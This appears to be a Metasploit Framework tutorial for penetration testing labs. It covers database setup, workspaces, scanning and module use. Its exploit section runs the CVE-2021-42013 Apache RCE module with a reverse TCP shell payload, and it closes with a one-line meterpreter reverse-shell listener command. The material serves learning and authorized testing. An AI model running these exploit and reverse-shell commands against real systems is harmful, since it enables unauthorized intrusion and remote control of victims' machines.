# 101

## Setup

### Database

On Kali Linux, the **Metasploit Framework (MSF)** does not start its PostgreSQL database by default. Enabling it is worthwhile: the database stores target data and tracks exploits.

```bash
# Initialize database
sudo msfdb init

# Start PostgreSQL service
sudo service postgresql start

# Launch MSF Console
sudo msfconsole -q

# Check database connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
```

### Workspaces

MSF uses **workspaces** to keep the data from different tests separate.

```bash
# Check current workspace
msf6 > workspace

# Create a new workspace
msf6 > workspace -a test_ws
[*] Added workspace: test_ws

# Switch to a specific workspace
msf6 > workspace test_ws
[*] Workspace: test_ws

# Check current workspace again
msf6 > workspace
  default
* test_ws
```

Scan results will now be saved in the selected workspace.

```bash
# Scan target
msf6 > db_nmap -A 192.168.50.202

# List discovered hosts
msf6 > hosts

# List discovered services
msf6 > services

# List services on port 445 (e.g., SMB)
msf6 > services -p 445
```

## Modules

MSF includes **modules** for various purposes, categorized for ease of use.

```bash
# List module categories
msf6 > show -h
```

### Auxiliary

**Auxiliary modules** perform tasks like scanning, fuzzing, and enumeration.

```bash
# List all auxiliary modules
msf6 > show auxiliary

# Filter modules by type
msf6 > search type:auxiliary smb

# Filter by name (e.g., SMB version scanner)
msf6 > search smb_version

# Use a specific module
msf6 > use 0

# View module info
msf6 auxiliary(scanner/smb/smb_version) > info

# List module options
msf6 auxiliary(scanner/smb/smb_version) > show options

# List required options that are not yet set
msf6 auxiliary(scanner/smb/smb_version) > show missing

# Set required options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.50.202

# Run module
msf6 auxiliary(scanner/smb/smb_version) > run
```

### Exploit

**Exploit modules** in MSF target specific vulnerabilities in applications or services.

Key features:

* **Database Integration**: Automatically tracks targets, services, and vulnerabilities.
* **Reliability**: Repeatable sessions for stable access.
* **Payload Flexibility**: Users can select payloads based on the exploit.

{% code overflow="wrap" %}

```bash
# Create a workspace for exploits
msf6 > workspace -a exploits
msf6 > workspace exploits

# Set target host
msf6 > setg RHOSTS 192.168.225.16

# Search for CVE-2021-42013 exploit
msf6 > search CVE-2021-42013

# Select exploit module
msf6 > use 0

# Configure payload and options
msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.45.242
msf6 exploit(multi/http/apache_normalize_path_rce) > set SSL false
msf6 exploit(multi/http/apache_normalize_path_rce) > set RPORT 80
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload linux/x64/shell_reverse_tcp

# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run
```

{% endcode %}

## Sessions & Jobs

**Sessions** manage interactions with successfully exploited targets. **Jobs** run in the background.

```bash
# Background the current session
^Z
Background session 1? [y/N] y

# List active sessions
msf6 > sessions -l

# Interact with a session
msf6 > sessions -i 1

# Close a session
msf6 > sessions -k 1
```

## Inline Commands

{% code overflow="wrap" %}

```bash
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.157; set LPORT 9999; exploit -j"
```

{% endcode %}

